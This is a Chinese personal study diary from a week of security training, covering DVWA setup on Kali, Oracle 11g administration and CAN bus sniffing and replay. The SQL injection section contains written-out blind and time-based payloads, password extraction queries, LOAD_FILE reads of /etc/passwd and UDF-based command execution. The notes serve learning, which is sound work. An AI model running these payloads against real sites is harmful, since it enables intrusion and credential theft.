第一天 (5.22)

一如既往的早餐 和Kali一起战斗!

狂想曲

ENIAC CNNIC vulnerability

KALI LINUX LAMP DVWA!!

将DVWA放到var/www/html下

T:

root@Ares:~# service apache2 start
root@Ares:~# service mysql start

mysql -u root

create database dvwa

exit

Firefox 地址栏输入: http://localhost/dvwalso/setup.php

似曾相识的错误:

(1)PHP function allow_url_include disabled

root@Ares:~# find / -name "php.ini"
/var/www/html/dvwalso/php.ini
/root/Downloads/dvwa/dvwalso/php.ini
/etc/php/7.0/cli/php.ini
/etc/php/7.0/apache2/php.ini

(2)Could not connect to the mysql service. please check the config file

第二天 (5.23)

有会议... 一起帮公司布置会场;

会议内容

第三天 (5.24)

深入学习SQL注入

盲注 (Blind Injection)

Web Server 关闭了错误回显

e.g.

If URL: http:/newspaper.com/items.php?id=2

SELECT title, description, body FROM items WHERE ID = 2

Else if URL: http:/newspaper.com/items.php?id=2 and 1=2

SELECT title, description, body FROM items WHERE ID=2 AND 1=2

Else if URL: http:/newspaper.com/items.php?id=2 and 1=1

SELECT title, description, body FROM items WHERE ID=2 AND 1=1

Timing Attack

BENCHMARK(count, expression): 将表达式 expression 执行 count 次; in mySQL

e.g.1

SELECT BENCHMARK(1000000,ENCODE('HELLO','GOODBYE'));

可以看到用时 0.21 秒; 可以通过返回的时间是否变长来判断注入语句是否执行成功 ^_^

边信道攻击

e.g.2 验证数据库名等名称

id = 1170 UNION SELECT   IF(SUBSTRING(current, 1, 1) = CHAR(xxx), BENCHMARK(5000000, ENCODE('MSG', 'by 5 seconds')), null)  FROM (Select Database() as current) as tb1;

system_user();

current_user();

last_insert_id();

current_user 具有写权限:

id = 1170 UNION ALL SELECT table_name, table_type, engine FROM information_schema.tables  WHERE table_schema =IF(SUBSTRING(current, 1, 1) = CHAR(xxx), BENCHMARK(5000000, ENCODE('MSG', FROM (Select Database() as current) as tb1;

技巧

id = 5 and subtring(@@version, 1, 1) = 4;

id = 5 union all select 1, 2, 3 from admin; -- isExist(TAB_NYM, admin)

id = 5 union all select 1, 2, passwd from admin; -- isExist(COL_NYM, passwd)

通过判断字符范围:

...id = 5 and ascii(substring((select concat(username, 0x3a, passwd) from users limit 0, 1), 1, 1)) > 64; 

id = 5 and ascii(substring((select concat(username, 0x3a, passwd) from users limit 0, 1), 1, 1)) > 65;

id = 5 and ascii(substring((select concat(username, 0x3a, passwd) from users limit 0, 1), 1, 1)) > 66;...

自动化SQL注入工具: sqlmap.py

读写文件:

...UNION SELECT 1, 1, LOAD_FILE('/etc/passwd'),1,1;

CREATE TABLE aresoul(line BLOB);UNION SELECT 1,1, HEX(LOAD_FILE('/etc/passwd')),1,1 INTO DUMPFILE '/tmp/aresoul';LOAD DATA INFILE '/tmp/aresoul' INTO TABLE aresoul;

导出 webshell or
用户自定函 (UDF):

创建UDF:

CREATE FUNCTION ares_defedf RETURNS INTEGER SONAME aresoul1

only in before MySQL 5;

lib_mysqludf_sys: sys_eval(), sys_exec(), sys_get(), sys_set()... // 执行输出 执行返码 获取环量 设置环量

asp

老爸生日! Happy Father!

下班直接回家给老爸过生日(见个面);

第四天 (5.25)

课程表 SQL注入实战; 梁爽姐姐讲解SQL;

第五天 (5.26)

Oracle 11g 安装与配置

Oracle

11g RDBMS

11.2RELEASE.0.3SMALL.0

10.2.0.5.0

11.2.0.4.0

LICENSE 无序列号

停服务 国税总局 安徽省 半夜升级 甲骨文喝茶

virtual box

ORACLE_BASE

ORACLE_HOME

20GB

mongoDB mySQL ALI 双11

ORACLE 大了 不灵活 前进慢

ORACLE_SID.dmt

SETUP.exe

数据库软件 客户端 绿色版

企业版 个人版

ORACLE diag xsz admin

cmd netca 1521

network/admin/listener.ora

监听

status start stop

创建数据库

EM管理

sys/ system/ dbsnmp 口令

数据库文件路径

快速恢复区

内存分配 sga pga

数据快和连接进程数

utf-8

win ORACLE环境变量

o'ra

角色 权限

CONNECT RESOURCE DBA大 EXP_FULL_DATABASE IMP_FULL_DATABACE

系统权限 实体权限

sys大 system

导入导出

EXP IMP

完全 EXP SYSTEM/MANAGER BUFFER=64000 FILE=C:/

用户 DMP

表TABLES=(SONIC)

数据泵 impdp expdp 空表

自己查表

Linux 远程地址 Linux安装Oracle()

第六天 (5.27)

Database Developer

IMP

再一天 (5.31)

梁爽姐姐详解CAN总线

CAN总线逆向

CAN协议不同

CAN总线: 6 H 14 L

TJA1054 SJA

OBD 连接器引脚  4/5 GRD

物理层 数据链路层

CAN ECU 多个滤波器 自己ID 11bits 数据 64bits

can-utils

TCPdump

Candump Canplayer Cansend

socketCAN

虚拟can网络

TEST

串行Can设备 M哦对

Slcan_attach -f -s6//500

监听 回放

Candump slcan0 -L >> log0.log

Canplayer -l 20/loop -I 日志.log -v

再二天 (6.1)

儿童节, 放一天假

再三天 (6.2)

CAN总线实战(是另一个组QAQ)